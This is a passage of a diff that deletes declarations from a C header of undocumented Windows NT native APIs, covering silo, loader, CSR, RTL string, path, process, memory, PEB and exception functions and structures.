-} SYSTEM_ROOT_SILO_INFORMATION, *PSYSTEM_ROOT_SILO_INFORMATION;
-
-typedef struct _SILO_USER_SHARED_DATA {
- ULONG64 ServiceSessionId;
- ULONG ActiveConsoleId;
- LONGLONG ConsoleSessionForegroundProcessId;
- NT_PRODUCT_TYPE NtProductType;
- ULONG SuiteMask;
- ULONG SharedUserSessionId;
- BOOLEAN IsMultiSessionSku;
- WCHAR NtSystemRoot[260];
- USHORT UserModeGlobalLogger[16];
-} SILO_USER_SHARED_DATA, *PSILO_USER_SHARED_DATA;
-
-typedef struct _OBP_SYSTEM_DOS_DEVICE_STATE {
- ULONG GlobalDeviceMap;
- ULONG LocalDeviceCount[26];
-} OBP_SYSTEM_DOS_DEVICE_STATE, *POBP_SYSTEM_DOS_DEVICE_STATE;
-
-typedef struct _OBP_SILODRIVERSTATE {
- PDEVICE_MAP SystemDeviceMap;
- OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;
- EX_PUSH_LOCK DeviceMapLock;
- OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;
-} OBP_SILODRIVERSTATE, *POBP_SILODRIVERSTATE;
-
-//incomplete, values not important, change between versions.
-typedef struct _ESERVERSILO_GLOBALS {
- OBP_SILODRIVERSTATE ObSiloState;
- //incomplete
-} ESERVERSILO_GLOBALS, *PESERVERSILO_GLOBALS;
-
-/*
-** SILO END
-*/
-
-/*
-** LDR START
-*/
-
-typedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(
- _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
- _In_ PVOID Context,
- _Inout_ BOOLEAN *StopEnumeration
- );
-
-typedef VOID(CALLBACK *PLDR_DLL_NOTIFICATION_FUNCTION)(
- _In_ ULONG NotificationReason,
- _In_ PCLDR_DLL_NOTIFICATION_DATA NotificationData,
- _In_opt_ PVOID Context);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrAccessResource(
- _In_ PVOID DllHandle,
- _In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry,
- _Out_opt_ PVOID *Address,
- _Out_opt_ PULONG Size);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrAddRefDll(
- _In_ ULONG Flags,
- _In_ PVOID DllHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrEnumerateLoadedModules(
- _In_opt_ ULONG Flags,
- _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction,
- _In_opt_ PVOID Context);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrFindResource_U(
- _In_ PVOID DllHandle,
- _In_ CONST ULONG_PTR* ResourceIdPath,
- _In_ ULONG ResourceIdPathLength,
- _Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrFindResourceDirectory_U(
- _In_ PVOID DllHandle,
- _In_ PLDR_RESOURCE_INFO ResourceInfo,
- _In_ ULONG Level,
- _Out_ PIMAGE_RESOURCE_DIRECTORY *ResourceDirectory);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrFindEntryForAddress(
- _In_ PVOID Address,
- _Out_ PLDR_DATA_TABLE_ENTRY *TableEntry);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrGetDllHandle(
- _In_opt_ PCWSTR DllPath,
- _In_opt_ PULONG DllCharacteristics,
- _In_ PCUNICODE_STRING DllName,
- _Out_ PVOID *DllHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrGetDllHandleEx(
- _In_ ULONG Flags,
- _In_opt_ PWSTR DllPath,
- _In_opt_ PULONG DllCharacteristics,
- _In_ PUNICODE_STRING DllName,
- _Out_opt_ PVOID *DllHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrGetDllHandleByMapping(
- _In_ PVOID BaseAddress,
- _Out_ PVOID *DllHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrGetDllHandleByName(
- _In_opt_ PUNICODE_STRING BaseDllName,
- _In_opt_ PUNICODE_STRING FullDllName,
- _Out_ PVOID *DllHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrGetDllFullName(
- _In_ PVOID DllHandle,
- _Out_ PUNICODE_STRING FullDllName);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrGetDllDirectory(
- _Out_ PUNICODE_STRING DllDirectory);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrSetDllDirectory(
- _In_ PUNICODE_STRING DllDirectory);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrGetProcedureAddress(
- _In_ PVOID DllHandle,
- _In_opt_ CONST ANSI_STRING* ProcedureName,
- _In_opt_ ULONG ProcedureNumber,
- _Out_ PVOID *ProcedureAddress);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrGetProcedureAddressForCaller(
- _In_ PVOID DllHandle,
- _In_opt_ PANSI_STRING ProcedureName,
- _In_opt_ ULONG ProcedureNumber,
- _Out_ PVOID *ProcedureAddress,
- _In_ ULONG Flags,
- _In_ PVOID *Callback);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrGetKnownDllSectionHandle(
- _In_ PCWSTR DllName,
- _In_ BOOLEAN KnownDlls32,
- _Out_ PHANDLE Section);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrLoadDll(
- _In_opt_ PCWSTR DllPath,
- _In_opt_ PULONG DllCharacteristics,
- _In_ PCUNICODE_STRING DllName,
- _Out_ PVOID *DllHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrUnloadDll(
- _In_ PVOID DllHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrQueryProcessModuleInformation(
- _Out_ PRTL_PROCESS_MODULES ModuleInformation,
- _In_ ULONG ModuleInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrRegisterDllNotification(
- _In_ ULONG Flags,
- _In_ PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction,
- _In_opt_ PVOID Context,
- _Out_ PVOID *Cookie);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrUnregisterDllNotification(
- _In_ PVOID Cookie);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrResSearchResource(
- _In_ PVOID File,
- _In_ CONST ULONG_PTR* ResIds,
- _In_ ULONG ResIdCount,
- _In_ ULONG Flags,
- _Out_ LPVOID *Resource,
- _Out_ ULONG_PTR *Size,
- _In_opt_ USHORT *FoundLanguage,
- _In_opt_ ULONG *FoundLanguageLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrOpenImageFileOptionsKey(
- _In_ PCUNICODE_STRING ImagePathName,
- _In_ BOOLEAN Wow64Path,
- _Out_ PHANDLE KeyHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrQueryImageFileExecutionOptions(
- _In_ PCUNICODE_STRING ImagePathName,
- _In_ PCWSTR OptionName,
- _In_ ULONG Type,
- _Out_ PVOID Buffer,
- _In_ ULONG BufferSize,
- _Out_opt_ PULONG ResultSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrQueryImageFileExecutionOptionsEx(
- _In_ PCUNICODE_STRING ImagePathName,
- _In_ PCWSTR OptionName,
- _In_ ULONG Type,
- _Out_ PVOID Buffer,
- _In_ ULONG BufferSize,
- _Out_opt_ PULONG ResultSize,
- _In_ BOOLEAN Wow64Path);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrQueryImageFileKeyOption(
- _In_ HANDLE KeyHandle,
- _In_ PCWSTR OptionName,
- _In_ ULONG Type,
- _Out_ PVOID Buffer,
- _In_ ULONG BufferSize,
- _Out_opt_ PULONG ResultSize);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrDisableThreadCalloutsForDll(
- _In_ PVOID DllImageBase);
-
-#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001
-#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002
-
-#define LDR_LOCK_LOADER_LOCK_DISPOSITION_INVALID 0x00000000
-#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_ACQUIRED 0x00000001
-#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_NOT_ACQUIRED 0x00000002
-
-#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrLockLoaderLock(
- _In_ ULONG Flags,
- _Out_opt_ ULONG *Disposition,
- _Out_ PVOID *Cookie);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrUnlockLoaderLock(
- _In_ ULONG Flags,
- _Inout_ PVOID Cookie);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrRelocateImage(
- _In_ PVOID NewBase,
- _In_ PSTR LoaderName,
- _In_ NTSTATUS Success,
- _In_ NTSTATUS Conflict,
- _In_ NTSTATUS Invalid);
-
-NTSYSAPI
-PIMAGE_BASE_RELOCATION
-NTAPI
-LdrProcessRelocationBlock(
- _In_ ULONG_PTR VA,
- _In_ ULONG SizeOfBlock,
- _In_ PUSHORT NextOffset,
- _In_ LONG_PTR Diff);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrShutdownProcess(
- VOID);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-LdrShutdownThread(
- VOID);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-LdrControlFlowGuardEnforced(
- VOID);
-
-/*
-** LDR END
-*/
-
-typedef struct _HANDLEENTRY {
- PHEAD phead; // Pointer to the Object.
- PVOID pOwner; // PTI or PPI
- BYTE bType; // Object handle type
- BYTE bFlags; // Flags
- WORD wUniq; // Access count.
-} HANDLEENTRY, *PHANDLEENTRY;
-
-typedef struct _SERVERINFO {
- WORD wRIPFlags;
- WORD wSRVIFlags;
- WORD wRIPPID;
- WORD wRIPError;
- ULONG cHandleEntries;
- // incomplete
-} SERVERINFO, *PSERVERINFO;
-
-typedef struct _SHAREDINFO {
- PSERVERINFO psi;
- PHANDLEENTRY aheList;
- ULONG HeEntrySize;
- // incomplete
-} SHAREDINFO, *PSHAREDINFO;
-
-typedef struct _USERCONNECT {
- ULONG ulVersion;
- ULONG ulCurrentVersion;
- DWORD dwDispatchCount;
- SHAREDINFO siClient;
-} USERCONNECT, *PUSERCONNECT;
-
-/*
-** Runtime Library API START
-*/
-
-/************************************************************************************
-*
-* CSR API.
-*
-************************************************************************************/
-
-NTSYSAPI
-ULONG
-NTAPI
-CsrGetProcessId(
- VOID);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-CsrClientConnectToServer(
- _In_ PWSTR ObjectDirectory,
- _In_ ULONG ServerDllIndex,
- _Inout_ PVOID ConnectionInformation,
- _Inout_ ULONG *ConnectionInformationLength,
- _Out_ PBOOLEAN CalledFromServer);
-
-/************************************************************************************
-*
-* RTL Strings API.
-*
-************************************************************************************/
-
-#ifndef RtlInitEmptyUnicodeString
-#define RtlInitEmptyUnicodeString(_ucStr,_buf,_bufSize) \
- ((_ucStr)->Buffer = (_buf), \
- (_ucStr)->Length = 0, \
- (_ucStr)->MaximumLength = (USHORT)(_bufSize))
-#endif
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlCreateUnicodeString(
- _Out_ PUNICODE_STRING DestinationString,
- _In_ PCWSTR SourceString);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlCreateUnicodeStringFromAsciiz(
- _Out_ PUNICODE_STRING DestinationString,
- _In_ PSTR SourceString);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlInitString(
- _Inout_ PSTRING DestinationString,
- _In_ PCSZ SourceString);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlInitUnicodeString(
- _Out_ PUNICODE_STRING DestinationString,
- _In_opt_ PCWSTR SourceString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlInitUnicodeStringEx(
- _Out_ PUNICODE_STRING DestinationString,
- _In_opt_ PWSTR SourceString);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlEqualUnicodeString(
- _In_ PCUNICODE_STRING String1,
- _In_ PCUNICODE_STRING String2,
- _In_ BOOLEAN CaseInSensitive);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDuplicateUnicodeString(
- _In_ ULONG Flags,
- _In_ PUNICODE_STRING StringIn,
- _Out_ PUNICODE_STRING StringOut);
-
-NTSYSAPI
-WCHAR
-NTAPI
-RtlUpcaseUnicodeChar(
- _In_ WCHAR SourceCharacter);
-
-NTSYSAPI
-WCHAR
-NTAPI
-RtlDowncaseUnicodeChar(
- _In_ WCHAR SourceCharacter);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlIsNameInExpression(
- _In_ PUNICODE_STRING Expression,
- _In_ PUNICODE_STRING Name,
- _In_ BOOLEAN IgnoreCase,
- _In_opt_ PWCH UpcaseTable);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlStringFromGUID(
- _In_ GUID *Guid,
- _Out_ PUNICODE_STRING GuidString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlGUIDFromString(
- _In_ PUNICODE_STRING GuidString,
- _Out_ GUID *Guid);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlPrefixUnicodeString(
- _In_ PCUNICODE_STRING String1,
- _In_ PCUNICODE_STRING String2,
- _In_ BOOLEAN CaseInSensitive);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlExpandEnvironmentStrings(
- _In_opt_ PVOID Environment,
- _In_reads_(SrcLength) PWSTR Src,
- _In_ SIZE_T SrcLength,
- _Out_writes_opt_(DstLength) PWSTR Dst,
- _In_ SIZE_T DstLength,
- _Out_opt_ PSIZE_T ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlExpandEnvironmentStrings_U(
- _In_opt_ PVOID Environment,
- _In_ PCUNICODE_STRING Source,
- _Out_ PUNICODE_STRING Destination,
- _Out_opt_ PULONG ReturnedLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlFormatCurrentUserKeyPath(
- _Out_ PUNICODE_STRING CurrentUserKeyPath);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlFreeUnicodeString(
- _In_ PUNICODE_STRING UnicodeString);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlEraseUnicodeString(
- _Inout_ PUNICODE_STRING String);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlFreeAnsiString(
- _In_ PANSI_STRING AnsiString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAnsiStringToUnicodeString(
- _Out_ PUNICODE_STRING DestinationString,
- _In_ PCANSI_STRING SourceString,
- _In_ BOOLEAN AllocateDestinationString);
-
-NTSYSAPI
-WCHAR
-NTAPI
-RtlAnsiCharToUnicodeChar(
- _Inout_ PUCHAR *SourceCharacter);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlUnicodeToMultiByteSize(
- _Out_ PULONG BytesInMultiByteString,
- _In_reads_bytes_(BytesInUnicodeString) PWCH UnicodeString,
- _In_ ULONG BytesInUnicodeString);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlDosPathNameToNtPathName_U(
- _In_ PCWSTR DosFileName,
- _Out_ PUNICODE_STRING NtFileName,
- _Out_opt_ PWSTR *FilePart,
- _Reserved_ PVOID Reserved);
-
-NTSYSAPI
-PWSTR
-NTAPI
-RtlIpv4AddressToStringW(
- _In_ const struct in_addr *Addr,
- _Out_ PWSTR S);
-
-NTSYSAPI
-LONG
-NTAPI
-RtlCompareUnicodeStrings(
- _In_reads_(String1Length) PWCHAR String1,
- _In_ SIZE_T String1Length,
- _In_reads_(String2Length) PWCHAR String2,
- _In_ SIZE_T String2Length,
- _In_ BOOLEAN CaseInSensitive);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlCopyString(
- _In_ PSTRING DestinationString,
- _In_opt_ PSTRING SourceString);
-
-NTSYSAPI
-CHAR
-NTAPI
-RtlUpperChar(
- _In_ CHAR Character);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlUpperString(
- _In_ PSTRING DestinationString,
- _In_ PSTRING SourceString);
-
-//
-// preallocated heap-growable buffers
-//
-typedef struct _RTL_BUFFER {
- PUCHAR Buffer;
- PUCHAR StaticBuffer;
- SIZE_T Size;
- SIZE_T StaticSize;
- SIZE_T ReservedForAllocatedSize; // for future doubling
- PVOID ReservedForIMalloc; // for future pluggable growth
-} RTL_BUFFER, *PRTL_BUFFER;
-
-typedef struct _RTL_UNICODE_STRING_BUFFER {
- UNICODE_STRING String;
- RTL_BUFFER ByteBuffer;
- UCHAR MinimumStaticBufferForTerminalNul[sizeof(WCHAR)];
-} RTL_UNICODE_STRING_BUFFER, *PRTL_UNICODE_STRING_BUFFER;
-
-//
-// These are OUT Disposition values.
-//
-#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_AMBIGUOUS (0x00000001)
-#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_UNC (0x00000002)
-#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_DRIVE (0x00000003)
-#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_ALREADY_DOS (0x00000004)
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlNtPathNameToDosPathName(
- _In_ ULONG Flags,
- _Inout_ PRTL_UNICODE_STRING_BUFFER Path,
- _Out_opt_ PULONG Disposition,
- _Inout_opt_ PWSTR* FilePart);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlIsDosDeviceName_U(
- _In_ PCWSTR DosFileName);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlGetFullPathName_U(
- _In_ PCWSTR lpFileName,
- _In_ ULONG nBufferLength,
- _Out_writes_bytes_(nBufferLength) PWSTR lpBuffer,
- _Out_opt_ PWSTR *lpFilePart);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlGetSearchPath(
- _Out_ PWSTR *SearchPath);
-
-typedef enum _RTL_PATH_TYPE {
- RtlPathTypeUnknown, // 0
- RtlPathTypeUncAbsolute, // 1
- RtlPathTypeDriveAbsolute, // 2
- RtlPathTypeDriveRelative, // 3
- RtlPathTypeRooted, // 4
- RtlPathTypeRelative, // 5
- RtlPathTypeLocalDevice, // 6
- RtlPathTypeRootLocalDevice // 7
-} RTL_PATH_TYPE;
-
-NTSYSAPI
-RTL_PATH_TYPE
-NTAPI
-RtlDetermineDosPathNameType_U(
- _In_ PCWSTR DosFileName);
-
-#define HASH_STRING_ALGORITHM_DEFAULT (0)
-#define HASH_STRING_ALGORITHM_X65599 (1)
-#define HASH_STRING_ALGORITHM_INVALID (0xffffffff)
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlHashUnicodeString(
- _In_ const UNICODE_STRING *String,
- _In_ BOOLEAN CaseInSensitive,
- _In_ ULONG HashAlgorithm,
- _Out_ PULONG HashValue);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAppendUnicodeStringToString(
- _In_ PUNICODE_STRING Destination,
- _In_ PUNICODE_STRING Source);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlAppendUnicodeToString(
- _In_ PUNICODE_STRING Destination,
- _In_opt_ PWSTR Source);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlCopyUnicodeString(
- _In_ PUNICODE_STRING DestinationString,
- _In_ PUNICODE_STRING SourceString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlUpcaseUnicodeString(
- _Inout_ PUNICODE_STRING DestinationString,
- _In_ PUNICODE_STRING SourceString,
- _In_ BOOLEAN AllocateDestinationString);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDowncaseUnicodeString(
- _Inout_ PUNICODE_STRING DestinationString,
- _In_ PUNICODE_STRING SourceString,
- _In_ BOOLEAN AllocateDestinationString);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlEraseUnicodeString(
- _Inout_ PUNICODE_STRING String);
-
-#define RTL_ENSURE_BUFFER_SIZE_NO_COPY (0x00000001)
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlpEnsureBufferSize(
- _In_ ULONG Flags,
- _Inout_ PRTL_BUFFER Buffer,
- _In_ SIZE_T NewSizeBytes);
-
-#define RtlInitBuffer(Buff, StatBuff, StatSize) \
- do { \
- (Buff)->Buffer = (StatBuff); \
- (Buff)->Size = (StatSize); \
- (Buff)->StaticBuffer = (StatBuff); \
- (Buff)->StaticSize = (StatSize); \
- } while (0)
-
-#define RtlEnsureBufferSize(Flags, Buff, NewSizeBytes) \
- ( ((Buff) != NULL && (NewSizeBytes) <= (Buff)->Size) \
- ? STATUS_SUCCESS \
- : RtlpEnsureBufferSize((Flags), (Buff), (NewSizeBytes)) \
- )
-
-#define RtlFreeBuffer(Buff) \
- do { \
- if ((Buff) != NULL && (Buff)->Buffer != NULL) { \
- if (RTLP_BUFFER_IS_HEAP_ALLOCATED(Buff)) { \
- UNICODE_STRING UnicodeString; \
- UnicodeString.Buffer = (PWSTR)(PVOID)(Buff)->Buffer; \
- RtlFreeUnicodeString(&UnicodeString); \
- } \
- (Buff)->Buffer = (Buff)->StaticBuffer; \
- (Buff)->Size = (Buff)->StaticSize; \
- } \
- } while (0)
-
-/************************************************************************************
-*
-* RTL Process/Thread API.
-*
-************************************************************************************/
-
-typedef NTSTATUS(*PUSER_PROCESS_START_ROUTINE)(
- PRTL_USER_PROCESS_PARAMETERS ProcessParameters
- );
-
-typedef NTSTATUS(*PUSER_THREAD_START_ROUTINE)(
- PVOID ThreadParameter
- );
-
-typedef struct _RTL_USER_PROCESS_INFORMATION {
- ULONG Length;
- HANDLE Process;
- HANDLE Thread;
- CLIENT_ID ClientId;
- SECTION_IMAGE_INFORMATION ImageInformation;
-} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;
-
-//
-// This structure is used only by Wow64 processes. The offsets
-// of structure elements should the same as viewed by a native Win64 application.
-//
-typedef struct _RTL_USER_PROCESS_INFORMATION64 {
- ULONG Length;
- LONGLONG Process;
- LONGLONG Thread;
- CLIENT_ID64 ClientId;
- SECTION_IMAGE_INFORMATION64 ImageInformation;
-} RTL_USER_PROCESS_INFORMATION64, *PRTL_USER_PROCESS_INFORMATION64;
-
-NTSYSAPI
-NTSTATUS
-STDAPIVCALLTYPE
-RtlSetProcessIsCritical(
- _In_ BOOLEAN NewValue,
- _Out_opt_ PBOOLEAN OldValue,
- _In_ BOOLEAN CheckFlag);
-
-NTSYSAPI
-NTSTATUS
-STDAPIVCALLTYPE
-RtlSetThreadIsCritical(
- _In_ BOOLEAN NewValue,
- _Out_opt_ PBOOLEAN OldValue,
- _In_ BOOLEAN CheckFlag);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateEnvironment(
- _In_ BOOLEAN CloneCurrentEnvironment,
- _Out_ PVOID *Environment);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateEnvironmentEx(
- _In_ PVOID SourceEnv,
- _Out_ PVOID *Environment,
- _In_ ULONG Flags);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlSetCurrentEnvironment(
- _In_ PVOID Environment,
- _Out_opt_ PVOID *PreviousEnvironment);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlQueryEnvironmentVariable_U(
- _In_opt_ PVOID Environment,
- _In_ PUNICODE_STRING Name,
- _Out_ PUNICODE_STRING Value);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDestroyEnvironment(
- _In_ PVOID Environment);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateProcessParameters(
- _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
- _In_ PUNICODE_STRING ImagePathName,
- _In_opt_ PUNICODE_STRING DllPath,
- _In_opt_ PUNICODE_STRING CurrentDirectory,
- _In_opt_ PUNICODE_STRING CommandLine,
- _In_opt_ PVOID Environment,
- _In_opt_ PUNICODE_STRING WindowTitle,
- _In_opt_ PUNICODE_STRING DesktopInfo,
- _In_opt_ PUNICODE_STRING ShellInfo,
- _In_opt_ PUNICODE_STRING RuntimeData);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlDestroyProcessParameters(
- _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateProcessParametersEx(
- _Out_ PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
- _In_ PUNICODE_STRING ImagePathName,
- _In_opt_ PUNICODE_STRING DllPath,
- _In_opt_ PUNICODE_STRING CurrentDirectory,
- _In_opt_ PUNICODE_STRING CommandLine,
- _In_opt_ PVOID Environment,
- _In_opt_ PUNICODE_STRING WindowTitle,
- _In_opt_ PUNICODE_STRING DesktopInfo,
- _In_opt_ PUNICODE_STRING ShellInfo,
- _In_opt_ PUNICODE_STRING RuntimeData,
- _In_ ULONG Flags);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateUserProcess(
- _In_ PUNICODE_STRING NtImagePathName,
- _In_ ULONG Attributes,
- _In_ PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
- _In_opt_ PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,
- _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
- _In_opt_ HANDLE ParentProcess,
- _In_ BOOLEAN InheritHandles,
- _In_opt_ HANDLE DebugPort,
- _In_opt_ HANDLE ExceptionPort,
- _Out_ PRTL_USER_PROCESS_INFORMATION ProcessInformationn);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-RtlCreateUserThread(
- _In_ HANDLE Process,
- _In_opt_ PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
- _In_ BOOLEAN CreateSuspended,
- _In_ ULONG StackZeroBits,
- _In_opt_ SIZE_T MaximumStackSize,
- _In_opt_ SIZE_T InitialStackSize,
- _In_ PUSER_THREAD_START_ROUTINE StartAddress,
- _In_opt_ PVOID Parameter,
- _Out_opt_ PHANDLE Thread,
- _Out_opt_ PCLIENT_ID ClientId);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlExitUserThread(
- _In_ NTSTATUS ExitStatus);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlExitUserProcess(
- _In_ NTSTATUS ExitStatus);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlFreeUserThreadStack(
- _In_ HANDLE hProcess,
- _In_ HANDLE hThread);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlPushFrame(
- _In_ PTEB_ACTIVE_FRAME Frame);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlPopFrame(
- _In_ PTEB_ACTIVE_FRAME Frame);
-
-NTSYSAPI
-PTEB_ACTIVE_FRAME
-NTAPI
-RtlGetFrame(
- VOID);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlEncodePointer(
- _In_ PVOID Ptr);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlDecodePointer(
- _In_ PVOID Ptr);
-
-/************************************************************************************
-*
-* RTL Memory Buffer API.
-*
-************************************************************************************/
-
-NTSYSAPI
-SIZE_T
-NTAPI
-RtlCompareMemoryUlong(
- _In_ PVOID Source,
- _In_ SIZE_T Length,
- _In_ ULONG Pattern);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlFillMemoryUlong(
- _Out_ PVOID Destination,
- _In_ SIZE_T Length,
- _In_ ULONG Pattern);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlFillMemoryUlonglong(
- _Out_ PVOID Destination,
- _In_ SIZE_T Length,
- _In_ ULONGLONG Pattern);
-
-/************************************************************************************
-*
-* RTL PEB API.
-*
-************************************************************************************/
-
-NTSYSAPI
-PPEB
-NTAPI
-RtlGetCurrentPeb(
- VOID);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlAcquirePebLock(
- VOID);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlReleasePebLock(
- VOID);
-
-/************************************************************************************
-*
-* RTL Exception Handling API.
-*
-************************************************************************************/
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlAddVectoredExceptionHandler(
- _In_ ULONG First,
- _In_ PVECTORED_EXCEPTION_HANDLER Handler);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlRemoveVectoredExceptionHandler(
- _In_ PVOID Handle);
-
-NTSYSAPI
-BOOLEAN
-NTAPI
-RtlDispatchException(
- _In_ PEXCEPTION_RECORD ExceptionRecord,
- _In_ PCONTEXT ContextRecord);
-
-NTSYSAPI
-PVOID
-NTAPI
-RtlAddVectoredContinueHandler(
- _In_ ULONG First,
- _In_ PVECTORED_EXCEPTION_HANDLER Handler);
-
-NTSYSAPI
-ULONG
-NTAPI
-RtlRemoveVectoredContinueHandler(
- _In_ PVOID Handle);
-
-NTSYSAPI
-VOID
-NTAPI
-RtlRaiseException(
- _In_ PEXCEPTION_RECORD ExceptionRecord);
-
-NTSYSAPI
-DECLSPEC_NORETURN
-VOID
-NTAPI
-RtlRaiseStatus(
- _In_ NTSTATUS Status);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtContinue(
- _In_ PCONTEXT ContextRecord,
- _In_ BOOLEAN TestAlert);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtRaiseException(
- _In_ PEXCEPTION_RECORD ExceptionRecord,
- _In_ PCONTEXT ContextRecord,
- _In_ BOOLEAN FirstChance);
-
-/************************************************************************************
-*
-* RTL Security API.
-*
